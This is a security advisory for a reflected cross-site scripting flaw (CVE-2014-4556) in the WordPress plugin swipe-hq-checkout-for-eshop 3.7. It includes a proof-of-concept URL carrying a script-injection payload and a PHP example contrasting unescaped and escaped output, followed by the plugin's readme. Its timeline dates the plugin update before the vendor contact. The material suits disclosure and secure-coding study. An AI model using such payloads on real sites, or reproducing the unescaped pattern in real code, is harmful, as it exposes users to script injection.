wp-plugin : swipe-hq-checkout-for-eshop

Plugin Details
Plugin Name: wp-plugin : swipe-hq-checkout-for-eshop
Affected Version : 3.7 (and most probably lower versions, if any)
Vulnerability : Reflected Cross-Site Scripting (XSS) via the api_url parameter of test-plugin.php
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/swipehqcheckoutforeshop/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%284%29%3C/script%3E

URL-decoded, the api_url value is api_url'><script>alert(4)</script>. The leading ' and > are there to close a single-quoted attribute and its tag before the script element: the parameter is reflected into the response without escaping, so the script executes in the browser of anyone who opens the link. No authentication is needed, because test-plugin.php is requested directly rather than through a WordPress admin page.
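The pattern behind this class of bug, as an added illustrative example that is not the plugin's own code: a diagnostic page echoes a request parameter into an HTML attribute, and the fix is escaping for that context. Only the parameter name api_url comes from the advisory; the markup, the function names and the single-quoted attribute are assumptions chosen to match the PoC payload.

```php
<?php
// Added illustrative example, not code from the swipe-hq-checkout-for-eshop plugin.
// The parameter name api_url matches the advisory; the markup and function names
// are assumptions made to show why the PoC payload  api_url'><script>alert(4)</script>
// works and how the same page is hardened.

// --- Vulnerable pattern: the GET value is concatenated straight into a
// single-quoted attribute. The payload's leading ' closes the attribute, its >
// closes the <input> tag, and the <script> element that follows is live markup.
function render_api_url_vulnerable(array $get): string
{
    $api_url = isset($get['api_url']) ? $get['api_url'] : '';
    return "<input type='text' name='api_url' value='" . $api_url . "'>";
}

// --- Hardened pattern: escape the value for the HTML attribute context before
// it is emitted. ENT_QUOTES is essential here: without it the single quote the
// PoC relies on is left untouched (that was the default before PHP 8.1).
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
// In a WordPress plugin the equivalent calls are esc_attr() for an attribute
// value and esc_url() for a value that is meant to be a URL, as api_url is.
function render_api_url_escaped(array $get): string
{
    $api_url = isset($get['api_url']) ? $get['api_url'] : '';
    $safe    = htmlspecialchars($api_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='text' name='api_url' value='" . $safe . "'>";
}

// A diagnostic file that is only meant for an administrator should additionally
// refuse to run when requested directly (no WordPress bootstrap) and require a
// capability. Both lines are WordPress-specific and therefore shown as comments
// so that this file still runs stand-alone with the PHP CLI:
//   if (!defined('ABSPATH')) { exit; }
//   if (!current_user_can('manage_options')) { wp_die('Unauthorized'); }

// The advisory's PoC value, URL-decoded (constructed from the PoC link above).
$payload = "api_url'><script>alert(4)</script>";

echo "vulnerable: ", render_api_url_vulnerable(['api_url' => $payload]), "\n";
echo "escaped:    ", render_api_url_escaped(['api_url' => $payload]), "\n";
```

Run it with the PHP CLI (php example.php). The first line of output shows the attribute terminated by the payload's quote and a bare <script> element in the markup; in the second line the quote and angle brackets come out as entities, so the browser renders the payload as the text content of the input rather than executing it. Escaping fixes the reflection itself; the ABSPATH and capability checks address the second finding recorded in this advisory, namely that the page is reachable unauthenticated at all.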


Disclosure Timeline
Vendor Contacted : 2014-01-20
Plugin Status : Updated on 2014-01-11
Public Disclosure : 2014-05-25
CVE Number : CVE-2014-4556
Plugin Description :
Version: 3.7.0 / 23 Sep 2013
Copyright: (c) 2012-2013, Optimizer Ltd.
Link: http://www.swipehq.com/checkout/

REQUIREMENTS
---
* Swipe account
* Wordpress
* Wordpress eShop plugin

INSTALLATION
---
1. Please install this plugin through the normal Wordpress installation process (Plugins -> Add New, then Search or Upload)
2. After successful installation it will appear in the list of Plugins as "Swipe Checkout for eShop"; make sure to Activate the plugin
3. Then configure Swipe: in the Plugins list, for Swipe Checkout, click on the Settings link, then add the following details from your Swipe Merchant login under Settings -> API Credentials:
   Swipe Merchant ID
   Swipe API Key
   Swipe API Url
   Swipe Payment Page Url
4. All done, test it out: add some products to your cart and you will get the option to pay with Swipe.

NOTES
---
* This plugin must be configured to use a currency that your Swipe Merchant Account supports; see Settings -> API Credentials for a list of currencies your Merchant Account supports, and see your settings for this plugin to see which currency it is using.

CHANGE LOG
---
1.0 - First Public Release.
2.0 - Test Mode Compatibility - Automatically Sets LPN and Redirect URL
3.0.0 - Fixed potential issues for concurrent transactions - Minor plugin enhancements
3.5.0 - Multi-currency Support - Multi-region support
3.6.0 - Cleanup - Adding link to plugin settings from Plugins page
3.7.0 - Added check configuration test butto